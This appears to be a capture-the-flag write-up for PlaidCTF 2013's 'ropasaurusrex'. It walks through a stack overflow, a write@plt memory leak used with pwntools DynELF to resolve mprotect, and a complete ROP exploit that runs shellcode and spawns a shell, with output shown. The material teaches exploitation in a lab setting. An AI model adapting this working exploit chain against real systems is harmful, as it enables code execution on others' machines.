ropasaurusrex was a challenge from PlaidCTF 2013, a baby's-first exercise in Return Oriented Programming. How to solve it has been documented exhaustively, but every solution I have seen assumes that we know which libc the binary runs under. The original challenge did hand out a copy of libc, but I don't like relying on that and it is not necessary, so my solution works without one.

Also, other solutions return to system("/bin/sh") or system("cat flag") or something similar, which is both boring and limiting. I want shellcode execution!

The binary

The code for the binary is very short:

read_func:
        push   ebp
        mov    ebp,esp
        sub    esp,0x98
        mov    DWORD PTR [esp+0x8],0x100
        lea    eax,[ebp-0x88]
        mov    DWORD PTR [esp+0x4],eax
        mov    DWORD PTR [esp],0x0
        call   read
        leave
        ret

main:
        push   ebp
        mov    ebp,esp
        and    esp,0xfffffff0
        sub    esp,0x10
        call   read_func
        mov    DWORD PTR [esp+0x8],0x4
        mov    DWORD PTR [esp+0x4],0x8048510  ; "WIN\n"
        mov    DWORD PTR [esp],0x1
        call   write
        leave
        ret

A C version of the above might look like this:

#include <unistd.h>  /* read, write */

void read_func(void) {
    char buffer[136];       /* sits at ebp-0x88 */
    read(0, buffer, 256);   /* up to 0x100 bytes into a 0x88-byte buffer */
}

int main(void) {
    read_func();
    write(1, "WIN\n", 4);
    return 0;
}

The vulnerability should be obvious: read_func reads up to 256 bytes into a 136-byte buffer. Write 136 bytes to fill the buffer; the next four bytes overwrite the saved ebp and the four after that overwrite the return address.

So we own the return address, and since raw bytes are read directly with read, there are no bad bytes. We can write anything!
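The layout described above can be written down as a few lines of plain Python. This is only a sketch using struct rather than pwntools; build_overflow is a name made up for illustration, and 0xdeadbeef is a placeholder return address, not a real target.

```python
import struct

BUFFER_SIZE = 0x88       # buffer starts at ebp-0x88, i.e. 136 bytes below ebp
SAVED_EBP_SIZE = 4       # saved ebp sits between the buffer and the return address
RET_OFFSET = BUFFER_SIZE + SAVED_EBP_SIZE
MAX_READ = 0x100         # read_func reads at most 0x100 bytes

def build_overflow(return_address, filler=b"A"):
    """Fill the buffer and saved ebp, then place a little-endian return address."""
    padding = filler * RET_OFFSET
    return padding + struct.pack("<I", return_address)

# Placeholder address, purely for illustration.
payload = build_overflow(0xdeadbeef)
print(RET_OFFSET, len(payload))
```

With 256 bytes readable and the return address at offset 140, there is room for 116 bytes of chain after the padding.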

Strategy

So where should we return to?

A technique I use all the time is resolving symbols dynamically, which pwntools helps us do with its DynELF class.

DynELF needs an arbitrary read primitive for resolving symbols and we can easily build one using the buffer overflow.

The read primitive takes an address as a parameter and should return at least one byte of data from that address. DynELF usually reads four bytes at a time for 32-bit binaries, though, so if we can return four bytes in one go, we should.
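To make that contract concrete, here is a minimal sketch in which a fake memory region stands in for the target process. FAKE_BASE, FAKE_MEMORY, read_u32 and read_cstring are names invented for illustration and are not part of pwntools; the sketch does not reproduce DynELF's internals, it only shows how larger reads can be composed from a function that returns a few bytes per call.

```python
import struct

# Hypothetical stand-in for the target's memory: a pointer followed by a string.
FAKE_BASE = 0x1000
FAKE_MEMORY = struct.pack("<I", 0x08049000) + b"libc\x00pad"

def leak(addr):
    """Return up to four bytes starting at addr, like the real primitive would."""
    offset = addr - FAKE_BASE
    return FAKE_MEMORY[offset:offset + 4]

def read_u32(leak_fn, addr):
    """Read one little-endian 32-bit word through the leak function."""
    return struct.unpack("<I", leak_fn(addr))[0]

def read_cstring(leak_fn, addr):
    """Keep leaking four bytes at a time until a NUL terminator shows up."""
    out = b""
    while b"\x00" not in out:
        chunk = leak_fn(addr + len(out))
        if not chunk:          # ran off the end of the fake memory
            break
        out += chunk
    return out.split(b"\x00", 1)[0]

print(hex(read_u32(leak, FAKE_BASE)), read_cstring(leak, FAKE_BASE + 4))
```

Returning four bytes per call means a pointer costs one round trip instead of four, which adds up quickly when every call is a full overflow.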

Our read primitive overflows the buffer and overwrites the return address with the address of write@plt (which, by the way, is at a static address and works the same as returning to write in libc). The arguments to write are stdout as the file descriptor, the given address as the buffer to write from, and four as the length.

Now for the really clever part: the return address for this call to write is read_func itself, so we get another go at overflowing the buffer and another read.
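Spelled out as 32-bit words, the stack this primitive sets up follows the usual cdecl order: the function to return into, then that function's own return address, then its arguments. The sketch below uses struct instead of pwntools. leak_frame is a hypothetical helper, and the write@plt address is passed in as a parameter because in practice it is looked up from the ELF; the value used in the example call is a dummy.

```python
import struct

RET_OFFSET = 140          # 136-byte buffer plus 4-byte saved ebp
READ_FUNC = 0x80483f4     # address of read_func, as used in this post's exploit
STDOUT = 1

def leak_frame(write_plt, addr, length=4):
    """Build one overflow that calls write(1, addr, length), then re-enters read_func."""
    words = [
        write_plt,   # overwritten return address: jump to write@plt
        READ_FUNC,   # where write returns to: another overflow opportunity
        STDOUT,      # write arg 1: file descriptor
        addr,        # write arg 2: address to leak from
        length,      # write arg 3: number of bytes to leak
    ]
    return b"A" * RET_OFFSET + struct.pack("<5I", *words)

# 0x11223344 is a dummy stand-in for write@plt, for illustration only.
frame = leak_frame(0x11223344, 0x08048000)
print(len(frame))
```

The whole frame is 160 bytes, comfortably inside the 256 bytes that read_func accepts.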

We will use this read primitive to resolve the mprotect function in libc. The final overflow then sends a ROP chain that mprotects a section of mapped memory to be readable, writable and executable, reads shellcode into that memory and returns to it. Simple, right?
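One detail worth keeping in mind is that mprotect expects a page-aligned start address, and readable+writable+executable is simply the three protection bits OR'ed together. The sketch below assumes 4 KiB pages and the Linux values of the PROT_* constants; mprotect_args is a hypothetical helper, not something from pwntools or libc.

```python
PAGE_SIZE = 0x1000                            # assumption: 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4    # Linux values from <sys/mman.h>

def mprotect_args(addr, length):
    """Round [addr, addr+length) out to whole pages and request rwx."""
    start = addr & ~(PAGE_SIZE - 1)
    end = (addr + length + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)
    return start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC

# An already aligned address with a short payload covers exactly one page.
print([hex(x) for x in mprotect_args(0x08049000, 44)])
```

An address that is already on a page boundary comes back unchanged, so the helper only matters when the chosen destination sits in the middle of a page.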

If you run ropasaurusrex and read its /proc/<pid>/maps file, you will see that 0x08049000 is mapped and writable, so we choose it as both the destination for the shellcode and the address to mprotect.
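Picking out writable mappings by eye works fine, but it can also be scripted. The following is a rough sketch of parsing the maps format; parse_maps_line and writable_mappings are made-up helper names, and SAMPLE is an illustrative snippet in the usual maps layout, not output captured from the real binary (the inode, device and path are invented).

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, path)."""
    fields = line.split()
    start, end = (int(x, 16) for x in fields[0].split("-"))
    perms = fields[1]
    path = fields[5] if len(fields) > 5 else ""
    return start, end, perms, path

def writable_mappings(maps_text):
    """Return every mapping whose permission string contains 'w'."""
    parsed = [parse_maps_line(l) for l in maps_text.splitlines() if l.strip()]
    return [m for m in parsed if "w" in m[2]]

# Illustrative sample only; values other than the address ranges are invented.
SAMPLE = """\
08048000-08049000 r-xp 00000000 08:01 123456 /tmp/ropasaurusrex
08049000-0804a000 rw-p 00000000 08:01 123456 /tmp/ropasaurusrex
"""

for start, end, perms, path in writable_mappings(SAMPLE):
    print(hex(start), hex(end), perms, path)
```

For a live process the text would come from reading /proc/<pid>/maps instead of the SAMPLE string.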

The exploit

The exploit is quite simple:

#!/usr/bin/env python2

from pwn import *
from time import sleep

context(arch = 'i386', os = 'linux')

r = process('./ropasaurusrex')

SHELLCODE = asm(shellcraft.sh())
RET_OFFSET = 140
READ_FUNC = 0x80483f4
MAIN_ELF = ELF('./ropasaurusrex')
MAPPED_ADDR = 0x08049000

#Read primitive for DynELF: leak AMOUNT_TO_READ bytes from addr
def l(addr):
    AMOUNT_TO_READ = 4
    r.send(flat('A' * RET_OFFSET,          #Padding up to the return address
                MAIN_ELF.plt['write'],     #Return to write@plt
                READ_FUNC,                 #..back to read_func after write
                1, addr, AMOUNT_TO_READ    #Args to write: fd, buf, count
                ))
    return r.recvn(AMOUNT_TO_READ) #Block until exactly that many bytes arrive

#Resolve mprotect from libc
dynelf = DynELF(l, elf=MAIN_ELF)
mprotect = dynelf.lookup('mprotect', 'libc')

#Build ROP chain: call mprotect, read the shellcode, jump to the shellcode
rop = ROP(MAIN_ELF)
rop.call(mprotect, (MAPPED_ADDR, len(SHELLCODE), 7))
rop.read(0, MAPPED_ADDR, len(SHELLCODE))
rop.call(MAPPED_ADDR)

#Send ROP chain
r.send(flat('A' * RET_OFFSET, rop.chain()))
#...shellcode must be sent separately
sleep(0.1)
#Send shellcode
r.send(SHELLCODE)
#aaand have a shell
r.interactive()

And it works:

$ ./exploit.py
[+] Starting local process './ropasaurusrex': Done
[*] '/home/robert/code/ROP/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Loading from '/home/robert/code/ROP/ropasaurusrex': 0xf7784918
[+] Resolving 'mprotect' in 'libc.so': 0xf7784918
[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: 94ab3e046784e5da65532a9aded8555c3bdc3778
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7731de0
[*] Found DT_STRTAB at 0xf7731de8
[*] Found DT_SYMTAB at 0xf7731df0
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Loaded cached gadgets for './ropasaurusrex'
[*] Switching to interactive mode
$ cat flag
Yes, you've got a shell!

I chose a simple shellcode that only gives me a shell, but I could have used a stager to load and run an advanced multi-megabyte payload. Simply returning to system("/bin/sh") would not let us do that.